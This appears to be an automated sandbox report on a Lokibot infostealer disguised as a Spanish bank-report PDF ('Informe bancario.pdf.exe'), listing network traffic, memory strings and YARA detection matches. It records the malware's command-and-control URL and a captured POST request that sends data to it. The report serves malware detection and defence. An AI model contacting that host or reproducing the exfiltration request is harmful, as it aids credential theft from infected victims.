Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 23 Jun 2022 15:55:40 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=ANdlC7UcGEh5m1HTK4j05IcjtMfBzgJh5Bk0%2F1gTeCj7nKEReTxIjP3M27aQCKBZnXI5hpnyapmd7muKDc%2BnHx4CATt8a6shCXMY7iAq5J6iHAUpkuHva6YTDMQ%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 71fe68cae972909a-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 23 Jun 2022 15:55:42 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=vD6qVK3%2FIKCTz3ypf%2B%2BSFPqEGaeZl7P4VwGxW45KkPFK3KKj9oosoyquUmxU%2BFb0QUhS4XVrMZ8KAPc0SQ5bLsTfRyLBMAlicdN5sDAMpCml%2Bo6cPzoVs9qetD0%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 71fe68d539ffbbe3-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 23 Jun 2022 15:55:46 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=S5%2F%2BqadrXgtz7ThItXIn%2BgXfmW6anzeh%2B591CEK9NUq9PUr9xCCDD2rPgsy47qrPKFdFhBQe6aLeBSHsBeHgoMNVGjoH4K3JjgxgTLkwD34Q0h8ZzAgnm%2B0V7c4%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 71fe68eb08ee9968-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 23 Jun 2022 15:55:50 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=hfT0dqYjL9yLERBu%2B0sBFWEaQwB1CFa4P4%2F3gtXP70TXSuvW%2BjG%2FsudrDNG2FZ45zuEl6yORiI%2FR7y0tleWWIsdTKyDDCWQAale%2F6MIiGv811PRy5Lwf4zIJRIg%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 71fe6909096006fd-LHRalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 23 Jun 2022 15:55:53 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=U7w7ZObQTczgnUXCgqSSevKrB7lFywSSahWQWOgXL9uCuGP3EUsTbSA6o9En7vWfs3JmQw5s2aWYHUQ62N0Pd%2BTAVL1pub0j5LS%2Fvv2HuOUctIeHAnXDdAde%2FnY%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 71fe691afa2a7759-LHRalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 23 Jun 2022 15:55:55 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=rR2Fy%2Bwc4EZFcdXZNOqIPOlDYFTsMbpUIOxIEKz0CCsR6evutYm1eMB79hESwqsLh2DsNHI8jmlVPOt%2FLVnW2cxU6Wtjh0NXEShIlQ3bQ6%2FPC7qTtlsGpBmgkaQ%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 71fe692889f971da-LHRalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 23 Jun 2022 15:55:58 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=j2xTysUgyBlv%2BGF%2BfyzX4Pqe81ORHNTjt%2FIAVNurbCNW8c8BnicNZm2P1zchzR43ui4aGlHmPlox69fxKVbfa8IffG%2FUSLJ8z9sptvHtOFCdoOzjVUU%2FRKK8OPM%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 71fe69388842068e-LHRalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 23 Jun 2022 15:56:00 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=ze9NFrHZ9IrfuGLxpPvBcSsLm0UomgLk8jPtdqquFlynktDCPfbpkVpR%2FYw4hD7WEGv%2B0MUqREfXG6Kk%2Bqj5B0rKQEMEfEOGC4RuR2zK%2F7ISS9%2Fj4ptzO%2FJudJo%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 71fe69478bbf9962-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 23 Jun 2022 15:56:02 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=S1WHOas3vJ7ZFYUp%2FoVVUCVxkbE%2B%2Fp%2B49GWBt85%2By8aInE%2Fgiju3xDMXtJloEZtOOoh0Qkt1%2FZQmQhzHs1QcSgmJ3isNDFUTbBPQR%2BKK%2FfS%2FNBvX4LpQuHNNmZ8%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 71fe69510ec4909d-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 23 Jun 2022 15:56:04 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=omOyIa%2FbwaXPJ05s%2FswmCZgfnEZ7LUKirOKbYW7ZqLOA%2BDqopKYCA80lwyTggiJdFJRy5LHqQXRYDuDGIw%2FBTrZq3IZvAVcLr9l98RagC6y3fNEi8XGjdLs5zR0%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 71fe695e4dcc76c5-LHRalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 23 Jun 2022 15:56:09 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=OxjygSRG8X%2FkV9bKGg9vKcukGQQMsZciUlD4EA%2FbKAdKhbAsUZHriNrmaDnwEjlvhCO2v0dr40IU6hwQz7EKgiICOz%2FwZ8BGMfZL6ripgHen%2FVFAblBWSK3ZE5M%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 71fe697a2bb27774-LHRalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 23 Jun 2022 15:56:11 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=vKWHn%2FyKZfK22jYwkSiqKJ3lNebyDNlMqc2uTH%2FWPL1CsEeS2wXJq7O8RBu3uo9kCAL4JgpjGnEOG2LPOeL7%2BiITMPF9gEE91z1aYp%2FlObWTDWMy78vsHq6Twg0%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 71fe698938c9903a-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 23 Jun 2022 15:56:14 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=ndR9ZCTJ1N11vjX%2Fx0YEz6iEdBcRwRBrFLR63RkojfAusVr7m8LQjcOnDZVKgChgIGzkLUZ6xRoemhHdLPRFdThTivALoGspyfOiDAiawxUfm5e3PqNs0e6Xj8o%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 71fe699a38fd8926-LHRalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 23 Jun 2022 15:56:17 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=GvokBvlFU7rHymLkT5aDrY0YFW9JOrqKdEQDAYp28XRPOV9nTidnZuNJsuZx2Ecpe%2BgluEOIUHEw87efs71zeLfR5jQPOg72GppPSuamirQio2LGHZU2xFJ7Yd4%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 71fe69addd1cbbcb-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 23 Jun 2022 15:56:20 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=49za7TeTSY%2BScp3L3mbuGYQSzA8lKA0u3%2ByMCtjhTcKDSwymE1%2FJodRsLTRHciEX8Kq0Ra9aNOm%2Ffy2I42Ob1ewYWyfNEryyYANBw%2BmQa%2BV%2F4yBU3%2BqCKwbOKrI%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 71fe69bfdc4a4052-LHRalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 23 Jun 2022 15:56:21 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=QtFAq1al83O%2FV%2B92iHB%2Bvj41q9z52fvvYULnr9pnDvcrgcXCZbRd%2Fg8PwqQ5%2B7osAmwSr8ZWHiJJHImkp%2FDMHhxFGmlMluudAzgI7dcN3u2RlpiJ3WS3kpCUnMU%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 71fe69c5cf035bdd-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Source: Informe bancario.pdf.exe, 00000000.00000002.295243151.0000000006962000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://fontfabrik.com
Source: Informe bancario.pdf.exe, 00000005.00000002.523820442.00000000004A0000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://kossa.xyz/esi/pp/play.php
Source: Informe bancario.pdf.exe, 00000000.00000002.295243151.0000000006962000.00000004.00000800.00020000.00000000.sdmp, Informe bancario.pdf.exe, 00000000.00000003.259547063.0000000005761000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: Informe bancario.pdf.exe, 00000000.00000002.295243151.0000000006962000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.carterandcone.coml
Source: Informe bancario.pdf.exe, 00000000.00000002.294664129.0000000005750000.00000004.00000800.00020000.00000000.sdmp, Informe bancario.pdf.exe, 00000000.00000002.295243151.0000000006962000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com
Source: Informe bancario.pdf.exe, 00000000.00000002.295243151.0000000006962000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers
Source: Informe bancario.pdf.exe, 00000000.00000002.295243151.0000000006962000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/?
Source: Informe bancario.pdf.exe, 00000000.00000002.295243151.0000000006962000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: Informe bancario.pdf.exe, 00000000.00000002.295243151.0000000006962000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: Informe bancario.pdf.exe, 00000000.00000002.295243151.0000000006962000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers8
Source: Informe bancario.pdf.exe, 00000000.00000002.295243151.0000000006962000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers?
Source: Informe bancario.pdf.exe, 00000000.00000002.295243151.0000000006962000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designersG
Source: Informe bancario.pdf.exe, 00000000.00000002.294664129.0000000005750000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.comce
Source: Informe bancario.pdf.exe, 00000000.00000002.294664129.0000000005750000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.comm
Source: Informe bancario.pdf.exe, 00000000.00000002.295243151.0000000006962000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fonts.com
Source: Informe bancario.pdf.exe, 00000000.00000002.295243151.0000000006962000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn
Source: Informe bancario.pdf.exe, 00000000.00000002.295243151.0000000006962000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: Informe bancario.pdf.exe, 00000000.00000002.295243151.0000000006962000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: Informe bancario.pdf.exe, 00000000.00000002.295243151.0000000006962000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: Informe bancario.pdf.exe, 00000000.00000002.295243151.0000000006962000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: Informe bancario.pdf.exe, 00000000.00000003.266552640.000000000578E000.00000004.00000800.00020000.00000000.sdmp, Informe bancario.pdf.exe, 00000000.00000003.268164390.000000000578D000.00000004.00000800.00020000.00000000.sdmp, Informe bancario.pdf.exe, 00000000.00000003.267203188.000000000578D000.00000004.00000800.00020000.00000000.sdmp, Informe bancario.pdf.exe, 00000000.00000003.267404179.000000000578D000.00000004.00000800.00020000.00000000.sdmp, Informe bancario.pdf.exe, 00000000.00000003.266370808.000000000578E000.00000004.00000800.00020000.00000000.sdmp, Informe bancario.pdf.exe, 00000000.00000003.268040307.000000000578D000.00000004.00000800.00020000.00000000.sdmp, Informe bancario.pdf.exe, 00000000.00000003.265954001.000000000578E000.00000004.00000800.00020000.00000000.sdmp, Informe bancario.pdf.exe, 00000000.00000003.266622693.000000000578E000.00000004.00000800.00020000.00000000.sdmp, Informe bancario.pdf.exe, 00000000.00000003.265897828.000000000578E000.00000004.00000800.00020000.00000000.sdmp, Informe bancario.pdf.exe, 00000000.00000003.266080343.000000000578E000.00000004.00000800.00020000.00000000.sdmp, Informe bancario.pdf.exe, 00000000.00000003.266290134.000000000578E000.00000004.00000800.00020000.00000000.sdmp, Informe bancario.pdf.exe, 00000000.00000003.266967198.000000000578D000.00000004.00000800.00020000.00000000.sdmp, Informe bancario.pdf.exe, 00000000.00000003.267554490.000000000578D000.00000004.00000800.00020000.00000000.sdmp, Informe bancario.pdf.exe, 00000000.00000003.266128541.000000000578E000.00000004.00000800.00020000.00000000.sdmp, Informe bancario.pdf.exe, 00000000.00000003.267148330.000000000578D000.00000004.00000800.00020000.00000000.sdmp, Informe bancario.pdf.exe, 00000000.00000003.267028927.000000000578D000.00000004.00000800.00020000.00000000.sdmp, Informe bancario.pdf.exe, 00000000.00000003.266471528.000000000578E000.00000004.00000800.00020000.00000000.sdmp, Informe bancario.pdf.exe, 00000000.00000003.267458378.000000000578D000.00000004.00000800.00020000.00000000.sdmp, Informe bancario.pdf.exe, 00000000.00000003.267763841.000000000578D000.00000004.00000800.00020000.00000000.sdmp, Informe bancario.pdf.exe, 00000000.00000003.266216146.000000000578E000.00000004.00000800.00020000.00000000.sdmp, Informe bancario.pdf.exe, 00000000.00000003.267060843.000000000578D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htmG
Source: Informe bancario.pdf.exe, 00000000.00000003.258511329.0000000005756000.00000004.00000800.00020000.00000000.sdmp, Informe bancario.pdf.exe, 00000000.00000002.295243151.0000000006962000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.goodfont.co.kr
Source: Informe bancario.pdf.exe, 00000000.00000003.258511329.0000000005756000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.goodfont.co.krF
Source: Informe bancario.pdf.exe, 00000000.00000003.258511329.0000000005756000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.goodfont.co.krZ
Source: Informe bancario.pdf.exe, Informe bancario.pdf.exe, 00000005.00000000.289365771.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Informe bancario.pdf.exe, 00000005.00000002.523674646.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://www.ibsensoftware.com/
Source: Informe bancario.pdf.exe, 00000000.00000003.260884494.0000000005752000.00000004.00000800.00020000.00000000.sdmp, Informe bancario.pdf.exe, 00000000.00000002.295243151.0000000006962000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: Informe bancario.pdf.exe, 00000000.00000003.260884494.0000000005752000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/s
Source: Informe bancario.pdf.exe, 00000000.00000002.295243151.0000000006962000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sajatypeworks.com
Source: Informe bancario.pdf.exe, 00000000.00000002.295243151.0000000006962000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sakkal.com
Source: Informe bancario.pdf.exe, 00000000.00000002.295243151.0000000006962000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sandoll.co.kr
Source: Informe bancario.pdf.exe, 00000000.00000003.258511329.0000000005756000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sandoll.co.krE
Source: Informe bancario.pdf.exe, 00000000.00000002.295243151.0000000006962000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.tiro.com
Source: Informe bancario.pdf.exe, 00000000.00000003.257122280.000000000576B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.tiro.comU
Source: Informe bancario.pdf.exe, 00000000.00000002.295243151.0000000006962000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.typography.netD
Source: Informe bancario.pdf.exe, 00000000.00000002.295243151.0000000006962000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.urwpp.deDPlease
Source: Informe bancario.pdf.exe, 00000000.00000002.295243151.0000000006962000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.zhongyicts.com.cn

Source: unknown

HTTP traffic detected: POST /esi/pp/play.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: kossa.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 690A3530Content-Length: 190Connection: close

Source: unknown

DNS traffic detected: queries for: kossa.xyz

Source: C:\Users\user\Desktop\Informe bancario.pdf.exe

Code function: 5_2_00404ED4 recv,

Source: Informe bancario.pdf.exe, 00000000.00000002.292050279.0000000000C08000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

System Summary

Malicious sample detected (through community Yara rule)

Source: 0.2.Informe bancario.pdf.exe.39c40c0.8.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 0.2.Informe bancario.pdf.exe.39c40c0.8.raw.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 0.2.Informe bancario.pdf.exe.39c40c0.8.raw.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.Informe bancario.pdf.exe.39f9f00.10.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 0.2.Informe bancario.pdf.exe.39f9f00.10.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 5.0.Informe bancario.pdf.exe.400000.12.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 5.0.Informe bancario.pdf.exe.400000.12.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 5.0.Informe bancario.pdf.exe.400000.12.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.Informe bancario.pdf.exe.29dc220.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 0.2.Informe bancario.pdf.exe.29dc220.5.raw.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 0.2.Informe bancario.pdf.exe.29dc220.5.raw.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 5.0.Informe bancario.pdf.exe.400000.12.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 5.0.Informe bancario.pdf.exe.400000.12.raw.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 5.0.Informe bancario.pdf.exe.400000.12.raw.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 5.0.Informe bancario.pdf.exe.400000.8.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 5.0.Informe bancario.pdf.exe.400000.8.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 5.0.Informe bancario.pdf.exe.400000.8.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 5.0.Informe bancario.pdf.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 5.0.Informe bancario.pdf.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 5.0.Informe bancario.pdf.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.Informe bancario.pdf.exe.39dfee0.9.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 0.2.Informe bancario.pdf.exe.39dfee0.9.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 5.0.Informe bancario.pdf.exe.400000.14.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 5.0.Informe bancario.pdf.exe.400000.14.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 5.0.Informe bancario.pdf.exe.400000.14.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.Informe bancario.pdf.exe.39f9f00.10.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 0.2.Informe bancario.pdf.exe.39f9f00.10.raw.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 0.2.Informe bancario.pdf.exe.39f9f00.10.raw.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 5.0.Informe bancario.pdf.exe.400000.10.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 5.0.Informe bancario.pdf.exe.400000.10.raw.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 5.0.Informe bancario.pdf.exe.400000.10.raw.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 5.0.Informe bancario.pdf.exe.400000.8.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 5.0.Informe bancario.pdf.exe.400000.8.raw.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 5.0.Informe bancario.pdf.exe.400000.8.raw.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 5.2.Informe bancario.pdf.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
